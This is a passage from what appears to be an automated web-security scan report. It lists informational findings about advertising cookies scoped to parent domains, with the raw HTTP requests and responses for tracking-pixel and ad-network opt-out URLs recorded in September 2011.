The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.31795264524407685/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27703FDE_10878AA%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=802568.8005145639%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@4@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:35:27 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@5@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
12.138. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.4155047545209527/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.4155047545209527/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.4155047545209527/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27704D7D_10F5909%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=284706.307342276%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@5@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:41:22 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@6@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
12.139. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.5863753461744636/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.5863753461744636/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.5863753461744636/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@12@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:19:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@13@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
12.140. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7161733908578753/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7161733908578753/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7161733908578753/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@10@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:08:19 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@11@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
12.141. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7414057147689164/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7414057147689164/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7414057147689164/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@6@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:41:25 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@7@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
12.142. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.8592949255835265/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.8592949255835265/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.8592949255835265/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@9@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:02:44 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@10@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
12.143. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9192736572586/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9192736572586/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9192736572586/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@8@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:54:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@9@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
12.144. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9203020841814578/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9203020841814578/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9203020841814578/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:24:02 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@1@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
12.145. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9359824557323009/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9359824557323009/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.9359824557323009/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@1@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:29:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@2@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
12.146. http://www.adadvisor.net/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adadvisor.net
Path:   /nai/optout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/optout?nocache=2.741539E-02 HTTP/1.1
Host: www.adadvisor.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ab=0001%3At0%2BFrgNo%2BFAbILbK0bvjQfxbqpTlpdNq

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:19:45 GMT
Server: Apache
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Set-Cookie: ab=opt-out; Domain=.adadvisor.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: aa=opt-out; Domain=.adadvisor.net; Expires=Tue, 14-Sep-2021 17:19:45 GMT; Path=/
Location: http://www.adadvisor.net/nai/verify
Content-Length: 0
Connection: close
Content-Type: text/plain

12.147. http://www.adbrite.com/mb/nai_optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adbrite.com
Path:   /mb/nai_optout.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mb/nai_optout.php?nocache=0.916557 HTTP/1.1
Host: www.adbrite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: Apache="168296556x0.184+1312290886x-1235322650"; ut="1%3AHczdEkAgEEDhd9nrLsRoGm8TyhC1QjGtd%2Fdze%2BabkyGW0GSw%2Bko%2B9Bs0ELwoIvEkpZmIU8EQ990Tj0bg8Ieg17kmfnq1WiqpOhi66TIv6dAuHwEGrXJOh%2FFfwn0%2F"; rb2=Ci4KBjc2MjcwMRiMzLScQCIeNDM5NTI0QUU5RTExMzc0RUIyQzBDNzE3NDBDNjA0EAE; vsd=0@2@4e74ce5b@www.gather.com; srh="1%3Aq64FAA%3D%3D"

Response

HTTP/1.1 302 Found
Content-Type: text/html
Date: Sat, 17 Sep 2011 17:15:01 GMT
Location: http://www.adbrite.com/mb/nai_optout.php?set=yes
P3P: policyref="http://www.adbrite.com/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache
Set-Cookie: ut=deleted; expires=Fri, 17-Sep-2010 17:15:00 GMT; path=/; domain=.adbrite.com
Set-Cookie: b=deleted; expires=Fri, 17-Sep-2010 17:15:00 GMT; path=/; domain=.adbrite.com
Set-Cookie: untarget=1; expires=Tue, 14-Sep-2021 17:15:01 GMT; path=/; domain=adbrite.com
Content-Length: 0

12.148. http://www.addthis.com/api/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/nai/optout?nocache=0.1942716 HTTP/1.1
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: uid=4e37104432fe1148; psc=1; di=%7B%222%22%3A%222040695539456590%2CMhd7ak45SYsADCcs%22%2C%226%22%3A%222230616255569715877%22%7D..1316270110.1EY|1316270110.60|1316270110.1FE|1316270110.1WV|1316270110.10R|1315247533.1OD; uvc=6|33,6|34,15|35,14|36,8|37; dt=X; loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:14:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: uid=0000000000000000; expires=Tue, 14-Sep-2021 17:14:44 GMT; path=/; domain=.addthis.com
Set-Cookie: di=deleted; expires=Fri, 17-Sep-2010 17:14:43 GMT; path=/; domain=.addthis.com
Set-Cookie: dt=deleted; expires=Fri, 17-Sep-2010 17:14:43 GMT; path=/; domain=.addthis.com
Set-Cookie: loc=deleted; expires=Fri, 17-Sep-2010 17:14:43 GMT; path=/; domain=.addthis.com
Set-Cookie: psc=deleted; expires=Fri, 17-Sep-2010 17:14:43 GMT; path=/; domain=.addthis.com
Set-Cookie: uvc=deleted; expires=Fri, 17-Sep-2010 17:14:43 GMT; path=/; domain=.addthis.com
Location: /api/nai/optout-verify
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

12.149. http://www.bizographics.com/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /nai/optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/optout?nocache=0.3010849 HTTP/1.1
Host: www.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KcrEpGTrCjyXaj5XcunNcMDa7Re6IGD4lJ9Tis0ipJBrjZAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRaQakHSuYMDW2wr0IgNIfwEVUJBxdqAyCAHxMRFwIDDbaJx1gHovcEOuphJipLa5wMipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Sat, 17 Sep 2011 17:16:30 GMT
Location: http://www.bizographics.com/nai/checkoptout
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizographicsID=""; Domain=.bizographics.com; Expires=Sat, 17-Sep-2011 17:16:31 GMT; Path=/
Set-Cookie: BizoID=""; Domain=.bizographics.com; Expires=Sat, 17-Sep-2011 17:16:31 GMT; Path=/
Set-Cookie: BizoData=""; Domain=.bizographics.com; Expires=Sat, 17-Sep-2011 17:16:31 GMT; Path=/
